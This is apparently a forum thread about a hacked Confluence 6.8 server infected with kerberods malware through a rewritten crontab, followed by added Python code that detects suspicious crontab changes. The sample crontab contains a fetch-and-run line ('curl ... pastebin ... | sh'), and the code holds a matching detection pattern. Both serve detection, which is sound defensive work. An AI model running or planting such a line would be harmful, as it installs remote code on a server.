Hello! I have Confluence ver. 6.8 on my server.
It was hacked somehow and somebody uses it to spam and flood from my server.
How is it possible? I have only Atlassian (+nginx) and Postgres on the server.
The malware is running as "confluence" user. They changed the crontab and run scripts from pastebin.com.
I agree with your diagnosis that you've been infected specifically with kerberods malware as linked in the other thread, based on the pastebin script that it pulled.
As described in the linked thread that you read, there's a two-step process needed to get this resolved:
Let me know if you have any questions about the upgrade!
Daniel | Atlassian Support
In syslog I see:
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 dbus: [system] Activating via systemd: service name='org.freedesktop.PolicyKit1' unit='polkitd.service'
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 systemd: Starting Authenticate and Authorize Users to Run Privileged Tasks...
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 polkitd: started daemon version 0.105 using authority implementation `local' version `0.105'
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 dbus: [system] Successfully activated service 'org.freedesktop.PolicyKit1'
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 systemd: Started Authenticate and Authorize Users to Run Privileged Tasks.
syslog.3.gz:Apr 12 14:10:23 vm-wiki-01 crontab: (confluence) REPLACE (confluence)
So I tried to disable polkitd.
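Added example, not part of the thread and not Atlassian's code: a Python check that picks out crontab REPLACE/DELETE events targeting service accounts in syslog lines like the ones quoted above, and lists crontab entries that fetch remote content. The service-account list, the function names and the sample inputs are assumptions made for the illustration.

```python
import re

# Accounts that run services and should never edit a crontab (assumed list).
SERVICE_ACCOUNTS = {"confluence", "postgres", "nginx", "www-data"}

# Matches cron's crontab audit line, with or without a zgrep "file:" prefix or a PID.
EVENT = re.compile(
    r"^(?:(?P<file>[^:\s]+):)?(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} [\d:]{8}) (?P<host>\S+) "
    r"crontab(?:\[\d+\])?: \((?P<actor>[^)]+)\) (?P<action>REPLACE|DELETE) \((?P<target>[^)]+)\)"
)
# Cron entries that download something, or mention a paste site, deserve review.
FETCH = re.compile(r"\b(curl|wget)\b|pastebin\.com", re.IGNORECASE)


def crontab_changes(log_text, accounts=SERVICE_ACCOUNTS):
    """Return crontab REPLACE/DELETE events whose target is a service account."""
    hits = []
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if m and m["target"] in accounts:
            hits.append(m.groupdict())
    return hits


def suspicious_entries(crontab_text):
    """Return non-comment crontab lines that fetch remote content."""
    return [ln.strip() for ln in crontab_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and FETCH.search(ln)]


# The first two lines are quoted from the thread; the last two are constructed.
SAMPLE_LOG = """\
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 systemd: Started Authenticate and Authorize Users to Run Privileged Tasks.
syslog.3.gz:Apr 12 14:10:23 vm-wiki-01 crontab: (confluence) REPLACE (confluence)
Apr 13 09:00:41 vm-wiki-01 crontab[2211]: (alice) REPLACE (alice)
Apr 13 09:05:02 vm-wiki-01 crontab[2290]: (root) LIST (postgres)
"""
# Constructed crontab content; the paste ID is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /opt/backup/run.sh
*/15 * * * * curl -s https://pastebin.com/raw/PLACEHOLDER | sh
"""

if __name__ == "__main__":
    for e in crontab_changes(SAMPLE_LOG):
        print(f"{e['ts']} {e['host']}: {e['actor']} {e['action']} crontab of {e['target']}")
    for entry in suspicious_entries(SAMPLE_CRONTAB):
        print("review:", entry)
```

The crontab content to check can be read with `crontab -l -u confluence` as root and passed to `suspicious_entries`.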